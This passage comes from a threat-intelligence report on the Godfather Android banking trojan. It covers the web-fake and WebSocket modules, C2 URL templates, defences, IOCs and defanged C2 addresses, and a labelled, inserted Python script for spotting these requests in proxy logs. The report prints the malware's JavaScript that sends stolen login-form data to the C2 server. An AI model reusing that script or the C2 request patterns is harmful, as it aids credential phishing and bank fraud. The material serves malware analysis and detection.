At the moment, Godfather processes three types of messages from the server:\r\nPerform the action “Back”\r\nExecute clicks\r\nEnter text into fields\r\nThe address of the WebSocket server to which the connection will be established must first be received from the C\u0026C server as an option in the InjectCommandRequest request.\r\nWeb-fake module\r\nLike Anubis, Godfather has a module for downloading and displaying web fakes (HTML pages that imitate the login form of a targeted application). The method of exfiltrating data from a web fake to the C\u0026C server in Godfather is the same as in Anubis.\r\nWeb fakes can be downloaded in two cases: if the user has followed the decoy push notification or if an application in the target list has been opened.\r\nIn the case of a fake push notification, a notification icon is downloaded in addition to the web fake. The icon is located at a URL in the following format:\r\n%DECRYPTED_C2%/icon/%PACKAGE_NAME%.png\r\n%PACKAGE_NAME% is the package name of the application that the fake push notification mimics. The URL for downloading web fakes is formed according to the following template:\r\n%DECRYPTED_C2%/itor/fafa.php?f=%PACKAGE_NAME%\u0026p=%KEY%|%LOCALE%\r\n%KEY% is the key sent as a parameter in the requests mentioned above. %LOCALE% is the system language. 
The user-agent used when the request is executed is:\r\nMozilla/5.0 (Linux; Android 9; SM-J730F Build/PPR12.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36\r\nThe HTML pages obtained as part of our analysis contain a JS script (the example is shown below) which processes the authorization form:\r\nfunction submit_data(form) {\r\n    var json = {};\r\n    for( var i = 0 ; i \u003c form.length ; i++ )\r\n    {\r\n        var input = form[i];\r\n        if ( input.type == \"submit\" )\r\n            continue;\r\n        json[ form[i].name ] = form[i].value;\r\n    }\r\n    logs = \"\"\r\n    $.each(json, function(i, v) {\r\n        logs = logs + \"\" + i + \":\" + v + \"//br//\";\r\n    });\r\n    top['closeDlg'] = true;\r\n    var url = '%C2%';\r\n    var imei_c = '%KEY%|%LOCALE%';\r\n    location.replace(url + '/sender_new.php?p=' + imei_c + \"|Injection_10|%PACKAGE_NAME%|\" + logs+'|91\r\n}\r\nWhen an authorization attempt is made, the script collects every non-submit field of the form and sends it to the C\u0026C server through location.replace, i.e. the WebView showing the fake is navigated to the C\u0026C URL and the credentials travel in the query string of a plain GET request. The request URL is formed according to the following template:\r\n%DECRYPTED_C2%/sender_new.php?p=%KEY%|%LOCALE%|Injection_10|%PACKAGE_NAME%|%FORMATTED_DATA%\r\n%FORMATTED_DATA% is a string formed according to the following template:\r\n%FIELD_NAME%:%FIELD_VALUE%//br//%FIELD_NAME%:%FIELD_VALUE%//br//\r\nConclusion\r\nSometimes the sequel really can be better than the original. The case of Godfather highlights how quickly Trojan developers can adapt their tools and stay one step ahead of Android security controls. Additionally, it shows how easily available source code, such as that of Anubis, can be modernized and relaunched, especially under the Malware-as-a-Service model.\r\nThe lack of direct communication between the threat actor and victim also makes Godfather an effective malware type. 
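Because the web-fake script above, the web-fake download URL and the ScreenCapture upload URL all follow fixed templates, the three modules can be recognised and their payloads decoded from ordinary HTTP proxy logs. The following is an added example and is neither code from the Group-IB report nor the malware's own code. The log line format, the host c2.example and the sample records are constructed; %KEY% is treated as an opaque token and %CURRENT_TIME_MS% is assumed to be a 13-digit millisecond epoch.

```python
# Added example (not part of the Group-IB report and not the malware's code):
# decode the Godfather C2 request patterns quoted above from proxy logs.
# Log format '<ts> <client> <method> <url> <status>', the host c2.example
# and SAMPLE_LOG are constructed for this illustration.
import re
from urllib.parse import parse_qs, urlsplit

# C2 paths quoted in the report, mapped to the module that uses them.
C2_PATHS = {
    '/mp4_recorder.php': 'ScreenCapture upload',
    '/itor/fafa.php': 'web-fake download',
    '/sender_new.php': 'web-fake form exfiltration',
}
ICON_RE = re.compile(r'^/icon/([A-Za-z0-9_.]+)[.]png$')   # /icon/%PACKAGE_NAME%.png
MP4_RE = re.compile(r'^(.+)_([0-9]{13})[.]mp4$')           # %KEY%_%CURRENT_TIME_MS%.mp4 (ms epoch assumed)


def match_c2_path(url):
    '''Return the Godfather module a URL path belongs to, or None.'''
    path = urlsplit(url).path
    if path in C2_PATHS:
        return C2_PATHS[path]
    if ICON_RE.match(path):
        return 'web-fake push icon'
    return None


def parse_fafa(url):
    '''Decode /itor/fafa.php?f=%PACKAGE_NAME%&p=%KEY%|%LOCALE%.'''
    q = parse_qs(urlsplit(url).query)
    key, _, locale = q.get('p', [''])[0].partition('|')
    return {'package': q.get('f', [''])[0], 'key': key, 'locale': locale}


def parse_sender_new(url):
    '''Decode p=%KEY%|%LOCALE%|Injection_10|%PACKAGE_NAME%|%FORMATTED_DATA%.

    Form fields arrive as NAME:VALUE pairs, each terminated by //br//.
    Whatever follows the last //br// is kept raw in 'trailing': the script
    appends further |-separated tokens after the form data (cut off in the
    report), so we do not guess their meaning.
    '''
    p = parse_qs(urlsplit(url).query).get('p', [''])[0]
    parts = p.split('|', 4)
    if len(parts) < 5:
        raise ValueError('not a sender_new payload')
    key, locale, injection, package, data = parts
    *pairs, trailing = data.split('//br//')
    fields = {}
    for pair in pairs:
        name, _, value = pair.partition(':')
        fields[name] = value
    return {'key': key, 'locale': locale, 'injection': injection,
            'package': package, 'fields': fields, 'trailing': trailing}


def scan_log(lines):
    '''Return (client, module, detail) for every request to a known C2 path.'''
    findings = []
    for line in lines:
        _ts, client, _method, url, _status = line.split()
        module = match_c2_path(url)
        if module is None:
            continue
        if module == 'web-fake form exfiltration':
            detail = parse_sender_new(url)
        elif module == 'web-fake download':
            detail = parse_fafa(url)
        else:
            detail = None
        findings.append((client, module, detail))
    return findings


# Constructed proxy log: one benign request followed by three C2 requests.
SAMPLE_LOG = [
    '2022-10-03T12:00:01Z 10.0.0.5 GET https://www.example.org/ 200',
    '2022-10-03T12:00:02Z 10.0.0.5 GET http://c2.example/itor/fafa.php?f=com.example.bank&p=ABC123|en_US 200',
    '2022-10-03T12:00:09Z 10.0.0.5 GET http://c2.example/sender_new.php?p=ABC123|en_US|Injection_10|com.example.bank|login:alice//br//password:hunter2//br//|91 200',
    '2022-10-03T12:02:15Z 10.0.0.5 POST http://c2.example/mp4_recorder.php 200',
]

if __name__ == '__main__':
    for client, module, detail in scan_log(SAMPLE_LOG):
        print(client, module, detail)
```

Since the stolen form is sent as a GET query string, the full credential set is visible in any proxy or egress log that records URLs, which makes the sender_new.php pattern a cheap retrospective hunt as well as a live detection; the decoded package name tells the responder which banking application's users were phished.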
Godfather does shut down on an infected device if it detects that the user is from Russia or a CIS country, but otherwise this model allows the malware to be spread across the world: all that is required is a web fake impersonating a bank or an e-wallet provider in a particular country.\r\nBy imitating Google Protect, Godfather can easily go undetected on infected devices. Unwitting users believe they are being protected by an Android service, but in fact the malicious actors gain access to their banking and financial portal accounts. While Group-IB does not have definitive data on the amount of money stolen by operators of Godfather, the methods harnessed by malicious actors are cause for concern.\r\nRecommendations on how to protect against Godfather\r\nThe security of mobile applications and operating systems is improving rapidly. However, it is too early to write Android banking Trojans off completely. In our experience, banking Trojans are still highly active and threat actors widely distribute modified Trojans whose source code is publicly available. A good example of this trend is Godfather, which is damaging not only to end users of banking applications but also to the banking sector as a whole.\r\nFor users\r\nBelow are some basic recommendations on how to protect mobile devices from banking Trojans like Godfather.\r\nAlways check for updates on your mobile device. The more recent the version of Android, the less vulnerable the device is to such threats.\r\nDo not download applications from sources other than Google Play (however, even Google Play cannot guarantee total security). 
Always check what permissions an application requests before installing it (in the case of Godfather, communication between the Trojan and the server only takes place after access to AccessibilityService has been granted, so an unexpected request for Accessibility access is a strong warning sign).\r\nDo not visit third-party and suspicious resources.\r\nDo not follow links in SMS messages.\r\nIf your device has been infected, do the following:\r\n1. Disable network access.\r\n2. Freeze any bank accounts that may have been accessed from your device.\r\n3. Contact experts to receive detailed information about the risks that the malware could pose to your device.\r\nFor organizations\r\nThe Group-IB Threat Intelligence team will continue to track Godfather and update our database with new indicators related to this Trojan. Additionally, our Threat Intelligence team will notify customers in cases in which their application is targeted by Godfather, or any other Android malware that we track.\r\nFor organizations that wish to protect their customers, implementing a solution that monitors user sessions, such as Group-IB Fraud Protection, will stop malware operators from defrauding their clients and damaging their reputation.\r\nGroup-IB’s Fraud Protection detects the latest fraud techniques, phishing preparation, and other types of attacks. The platform integrates data from Group-IB’s attribution-based Threat Intelligence system. Exclusive information about cybercriminals, malware, adversary IP addresses, and compromised data (logins, passwords, bank cards) supports anti-fraud systems and cybersecurity teams, allowing the latter to identify intruders and their actions.\r\nIn this way, Fraud Protection “catches” banking Trojans, detects unauthorized remote access, web injections, cross-channel attacks, and personal data collection. 
Group-IB’s solution implements patented algorithms that help detect infected devices without the client’s involvement and without the need to install additional software.\r\nLinks\r\nhttps://twitter.com/ThreatFabric/status/1505932079401480198\r\nhttps://securityintelligence.com/anubis-strikes-again-mobile-malware-continues-to-plague-users-in-official-app-stores/\r\nhttps://www.threatfabric.com/blogs/2020_year_of_the_rat\r\nhttps://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html\r\nhttps://www.threatfabric.com/blogs/anubis_2_malware_and_afterlife\r\nIOCs\r\nAPKs (SHA-256):\r\n0b72c22517fdefd4cf0466d8d4c634ca73b7667d378be688efe131af4ac3aed8\r\n7664293fc1dde797940d857d1f16eb1e12a15b9126d704854f97df1bedc18758\r\n9815ba07d0a2528c11d377b583243df24218a48c6a4f839f40769ea290555070\r\na14aad1265eb307fbe71a3a5f6e688408ce153ff19838b3c5229f26ee3ece5dd\r\nc3dadb9a593523d1bf3fe76dabf375578119aff3110d92a1a4ee6db06742263a\r\nc4bace10849f23e9972e555ac2e30ac128b7a90017a0f76c197685a0c60def6d\r\nc79857015dbf220111e7c5f47cf20a656741a9380cc0faecd486b517648eb199\r\nd652ac528102de3ebb42a973db639ae27f13738e005172e5ff8aac6e91f3f760\r\nb6249fa996cb4046bdab37bab5e3b4d43c79ea537f119040c3b3e138149897fd\r\n9dfb5b4ad9aac36c2d7fbb93f8668faa819cb0df16f4a55d00f1cdda89c9a6d2\r\n38386f4fabd0bc7f7065eaee818717e89772fb3b1a3744df754c45778e353f70\r\nTelegram channels\r\nhttps://t.me/dobrynyanikitichsobre\r\nhttps://t.me/dobrynyanikitichwarrior\r\nhttps://t.me/nutkomterposekcons\r\nhttps://t.me/puykomterivon\r\nhttps://t.me/dukestepanovich\r\nhttps://t.me/bektororrope\r\nhttps://t.me/ropenetwork\r\nhttps://t.me/brutalhazing\r\nhttps://t.me/rosesoldiermans\r\nhttps://t.me/kingwallmansjob\r\nC\u0026C 
addresses (defanged)\r\nhXXps://henkormerise[.]com/\r\nhXXp://168[.]100[.]9[.]86/\r\nhXXp://50[.]18[.]3[.]26/\r\nhXXp://45[.]61[.]138[.]60/\r\nhXXps://banerrokutepera[.]com/\r\nhXXp://heikenmorgan[.]com/\r\nFigure 5: Replicated DNS A records for Godfather’s C\u0026C addresses\r\n[Screenshot of the hosted application on Google Play]\r\nSource: https://blog.group-ib.com/godfather-trojan",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.group-ib.com/godfather-trojan"
	],
	"report_names": [
		"godfather-trojan"
	],
	"threat_actors": [],
	"ts_created_at": 1777949165,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ad279fa12ff24bffde1379e9761a9209b78f304b.pdf",
		"text": "https://archive.orkl.eu/ad279fa12ff24bffde1379e9761a9209b78f304b.txt",
		"img": "https://archive.orkl.eu/ad279fa12ff24bffde1379e9761a9209b78f304b.jpg"
	}
}